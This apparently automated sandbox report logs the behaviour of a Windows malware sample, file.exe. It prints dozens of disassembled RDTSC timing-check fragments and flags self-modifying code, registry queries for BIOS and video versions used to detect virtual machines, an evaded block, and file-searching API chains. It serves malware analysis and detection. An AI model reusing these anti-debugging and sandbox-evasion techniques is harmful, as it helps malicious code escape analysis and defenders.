                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B81B4 second address: 9B81C6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9FD080A006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F9FD080A006h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB4F2 second address: 9BB508 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F9FD0C645ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB508 second address: 9BB50C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BACB0 second address: 9BACBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9FD0C645E6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BACBD second address: 9BACC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAE6C second address: 9BAE83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0C645F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB009 second address: 9BB012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB012 second address: 9BB041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0C645F5h 0x00000009 jmp 00007F9FD0C645F5h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB041 second address: 9BB046 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB046 second address: 9BB091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007F9FD0C645F8h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9FD0C645F8h 0x00000014 jmp 00007F9FD0C645F2h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF207 second address: 9BF20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BECD3 second address: 9BECDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BECDB second address: 9BECEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9FD080A006h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BECEB second address: 9BECF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2F78 second address: 9C2FA0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9FD080A00Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F9FD080A014h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2701 second address: 9C270B instructions: 0x00000000 rdtsc 0x00000002 je 00007F9FD0C645E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2ACA second address: 9C2AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2AD0 second address: 9C2AD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2AD6 second address: 9C2B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9FD080A00Ch 0x0000000b jmp 00007F9FD080A018h 0x00000010 pushad 0x00000011 jmp 00007F9FD080A00Fh 0x00000016 jmp 00007F9FD080A014h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7383 second address: 9C738B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C738B second address: 9C73BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F9FD080A014h 0x0000000a popad 0x0000000b push esi 0x0000000c ja 00007F9FD080A006h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007F9FD080A006h 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C74EA second address: 9C7506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F9FD0C645ECh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnp 00007F9FD0C645E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7506 second address: 9C7515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F9FD080A006h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7515 second address: 9C751D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7660 second address: 9C769A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9FD080A01Fh 0x00000008 jmp 00007F9FD080A00Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F9FD080A01Ch 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C769A second address: 9C76A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7806 second address: 9C7811 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7811 second address: 9C781C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C781C second address: 9C7830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD080A010h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7830 second address: 9C783D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9FD0C645E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D514 second address: 96D52D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD080A015h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D52D second address: 96D537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9FD0C645E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D537 second address: 96D5A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD080A012h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dx, si 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F9FD080A008h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D3AF4h], edx 0x00000033 jmp 00007F9FD080A012h 0x00000038 mov dword ptr [ebp+122D2805h], ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F9FD080A014h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0947 second address: 9D094D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE9BB second address: 9CE9C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEDF9 second address: 9CEE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jp 00007F9FD0C645E6h 0x0000000e popad 0x0000000f jo 00007F9FD0C645F2h 0x00000015 jbe 00007F9FD0C645E6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEE16 second address: 9CEE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9FD080A012h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEE2F second address: 9CEE4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9FD0C645F1h 0x00000008 jnl 00007F9FD0C645E6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF187 second address: 9CF1BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jl 00007F9FD080A006h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9FD080A010h 0x00000011 push edi 0x00000012 jmp 00007F9FD080A014h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFA69 second address: 9CFA79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F9FD0C645FDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFFD1 second address: 9CFFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFFD6 second address: 9CFFDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFFDC second address: 9CFFE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D05E7 second address: 9D05FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0C645EEh 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D05FF second address: 9D0603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0603 second address: 9D0607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7462 second address: 9D7472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007F9FD080A006h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA2D7 second address: 9DA2DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA2DB second address: 9DA2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F9FD080A00Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA2ED second address: 9DA2FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 jng 00007F9FD0C645FFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA5BB second address: 9DA5C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA5C1 second address: 9DA5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA5C5 second address: 9DA5ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD080A00Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9FD080A018h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA5ED second address: 9DA5F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA89D second address: 9DA8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA8A5 second address: 9DA8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9FD0C645E6h 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA8B0 second address: 9DA8B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA8B8 second address: 9DA8E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0C645F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9FD0C645EEh 0x00000010 jmp 00007F9FD0C645EAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAA0D second address: 9DAA11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAA11 second address: 9DAA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAA1D second address: 9DAA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAA21 second address: 9DAA33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9FD0C645EAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAB6F second address: 9DAB8B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9FD080A006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F9FD080A012h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAB8B second address: 9DAB95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F9FD0C645E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAD1F second address: 9DAD3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F9FD080A00Fh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E187A second address: 9E18A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0C645F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E18A0 second address: 9E18AE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1CC8 second address: 9E1CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1CCC second address: 9E1CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1CDA second address: 9E1CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1CE1 second address: 9E1D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F9FD0EA45C6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jbe 00007F9FD0EA45B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1E75 second address: 9E1E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1FA1 second address: 9E1FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1FA5 second address: 9E1FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2204 second address: 9E221B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45C3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E221B second address: 9E2225 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9FD0CB38B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2225 second address: 9E224D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F9FD0EA45DBh 0x0000000f js 00007F9FD0EA45BEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E23BC second address: 9E23D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F9FD0CB38BFh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E14BC second address: 9E14DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F9FD0EA45B6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9892 second address: 9E9896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9896 second address: 9E98A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F9FD0EA45BEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9A1A second address: 9E9A2E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9FD0CB38B6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F9FD0CB38B6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB201 second address: 9EB205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF18F second address: 9FF194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF194 second address: 9FF1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45C7h 0x00000009 jng 00007F9FD0EA45B6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F9FD0EA45B6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF1C1 second address: 9FF1D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9FD0CB38B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F9FD0CB38B6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B474 second address: A0B486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F9FD0EA45BEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B486 second address: A0B48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D6A1 second address: A0D6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45C2h 0x00000009 jmp 00007F9FD0EA45C3h 0x0000000e popad 0x0000000f jmp 00007F9FD0EA45C0h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7CDBD9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7CDCB6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 987E6F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 96C9FE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9F0A4A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-37392)
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
